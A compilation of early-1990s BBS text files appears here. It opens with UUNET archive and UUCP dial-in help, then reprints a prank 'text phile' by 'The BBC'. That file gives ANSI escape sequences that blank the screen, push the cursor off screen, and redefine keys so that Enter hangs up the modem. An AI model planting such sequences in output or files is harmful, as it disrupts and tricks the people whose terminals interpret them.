# Set up for a Telebit.
uunet Any cua0 19200 cua0 "" ATX0S50=255S111=30DT19004687727\r CONNECT ""
login: uucp
Modify as appropriate for your site, of course, to deal with your
local telephone system and uucp version.
All modems on the 900 lines are Telebit T2500s. Note that these
modems first answer with V.32, then at 2400, 1200, and last with PEP
tones. This "900" number charges $.50US per minute to the caller.
2. Where the files are
This file of instructions exists as the file uunet!/info/archive-help
uunet!/ls-lR.Z contains a list of all files available. This is the
compressed output of an `ls -lR' command. This file is updated each
night. (Note this file is currently about 520 Kbytes *compressed*).
Information on other indexes can be found in uunet!/index/README.
The file uunet!/info/layout details the basic organization of the
archive.
3. File formats
Files with .Z endings are compressed. The uncompress program is
available in uunet!/compress.tar if you don't have it.
Some very large files have been split into several files for you.
This are usually evidenced by sequenced endings after a .Z ending.
eg: emacs/18.57.Z.01 .. emacs/18.57.Z.39
After you obtain all of the parts you need only concatenate them
in the proper order.
eg: cat 18.57.Z.* > emacs-18.57.Z
UUCP File Transfer Tips
You must write files you transfer to a directory which the user
"uucp" has write access. That user, not you, will actually do the
transfer. /usr/spool/uucppublic is the common place used.
You may see different pathnames for files in an archive which
equate to the same thing. For example an archive that is /usr/spool/ftp
(aka ftp), might also accessible as /usr/spool/uucppublic (aka
uucp, or just for UUCP).
Be sure you use absolute pathnames when specifying remote filename.
If you don't, your working directory will be prepended to the
pathname in the command. uunet!file and uunet!/file are different.
uunet!/ is the best reference to the base of the archive via uucp.
Permission denied messages normally indicate a file name or
file access problem. Be sure to have the latest copy of the file
list.
Beware when using shell meta-characters in transfers. You need to
escape them in most circumstances (eg: the ! in csh). Also note
that there are a number of UUCP implementations which do not handle
multi-file transfers correctly. If you pass a * to the remote
system you may get 'access denied' messages. These indicate a UUCP
problem, not a file problem.
OTHER RESOURCES
In addition to the resources already mentioned, there are several
books which discuss USENET and/or UUCP maintenance. They include:
Using UUCP and Usenet; Grace Todino; ISBN 0-937175-10-2
Date: 1990. Pages: 210. Cost: $24.95
Managing UUCP and Usenet; Tim O'Reilly and Grace Todino;
ISBN 0-937175-48-X. Date: 1990. Pages: 289. Cost: $24.95
Both are "Nutshell" handbooks. O'Rielly and Associates: 981 Chestnut
Street Newton MA 02164 USA, 1-800-338-NUTS. E-mail: ...!uunet!ora!nuts
Unix Communications; Bart Anderson, Barry Costales, and Harry
Henderson, Harry; The Waite Group. ISBN 0-672-22773-8. Date: 1991.
Pages: 736. Cost: $29.95.
Covers everything the end user needs to know about email, USENET and UUCP.
------------------------------------------------------------------------------
------------------
| Article 8 of 8 |
------------------
To: hackers@tsf.UUCP
Subject: Text phile 3.
From: bbc@tsf.UUCP (The BBC)
Organization: The CyberUnderground
Welcome, Kiddies... To another jam packed fun day at... The BBC's
crash house... Todays secret word is 'ANSI'... Yes after this lesson
when ever a sysop/user hears the word 'ANSI', They will scream real
loud!!!
First lets ask our friend Crashy a question... Crashy, do you
use a term package that supports... 'ANSI' [AAAAAAAAHHHHHHH] or have
the driver 'ANSI.sys' [AAAAHHHHH] loaded in your config.sys???
'Well... Yes, I guess'... Good, See kiddies every one uses it but
few understand it... An that is how we will play with the users
of a bbs's mind as well as the sysops [usually not much of one here]...
First a bit of an explanation... ANSI [AAAAHHHHHHH] is a method
of controlling IO on remote systems... It uses escape sequences to
do every thing from moving the cursor around and changing color of
the text to redefining the keyboard keys... A very useful tool for
helping computer users and making nice displays.. An a cheep shot
as far as hacking games go... But that never stoped us before... For
what if some devious minds where to put them to use??? An we are just
the ones to do it... Also for those who don't know, [ESC] stands for
the escape char. [0x1b] or to type it in remote hold down the ALT key
while typing 27 on the numeric key pad then release the ALT key...
Lets start with a classic... We all know to change the text color
you use the sequence 'ESC[<color>;<color>;...<color>m' and it will
change the color for all following text till it is used again... Well
what if one uses the command 'ESC[0;8m'... This would cause the ANSI
[AAAAHHHHH] driver to reset the color to default then set the screen
to black text on a black background... What a glorious sight (or lack
of there) when the computer just seems to stop... No text no
nothing... An if they don't reset it, well.... All the boards they
call afterwards will do the same...
Or how about this one... 'ESC[=0h;=7l'... All it does is set the
screen to 40 column mode and turns line wrapping off... So there eyes
get a rest... only half the calories of a regular screen and in
larger portions...
Then there is the story of the farmer's 'ESC[26;0H'... Moving the
cursor off the screen and making them wait for the next prompt (if
this command is at the end of a message) that seams to never come...
But you should not tell this joke in polite company...
An of course we saved the best for last... The ol' Two Face key
change... Just use the command 'ESC[<From key>;<To key>p' and wha-la
instant chaos... For example 'ESC[13;0;35p', next time the [ENTER]
key is hit it changes into a ALT-H (The hangup command for most
term packages... An we would hope you would not use this to just
redefine the whole keyboard so that what they type is not what
they get!!! That would be.... bad... An you are not a bunch of
bad boys and girls are you... We thought so...
So boys and girls... Its time to go... and remember...
The night belongs to the hackers... The early hacker gets to DOS...
A virus in the system is worth 2 trojans in the bush... Ect.. Ect..
Ect..
'Another fine mess' from your friends at...
The BBC
----------------------------------------------------------------------
...uunet!rayssd!galaxia!underg!tsf!bbc (The BBC)
-=[ "Anarchy is never HAVING to say you're sorry." ]=-
------------------------------------------------------------------------------
That's all folks...keep that e-mail coming!
------------------------------------------------------------------------------
-= Max Cray =-
Internet: underg!max@uunet.uu.net Support
UUCP: ...!uunet!underg!max Free
Data: The Underground Computing Foundation BBS Software
401-847-2603 -=- 9600 baud (v.32) (w/src)
CI$: 76334,2203

Downloaded From P-80 International Information Systems 304-744-2253
Reference in New Issue View Git Blame Copy Permalink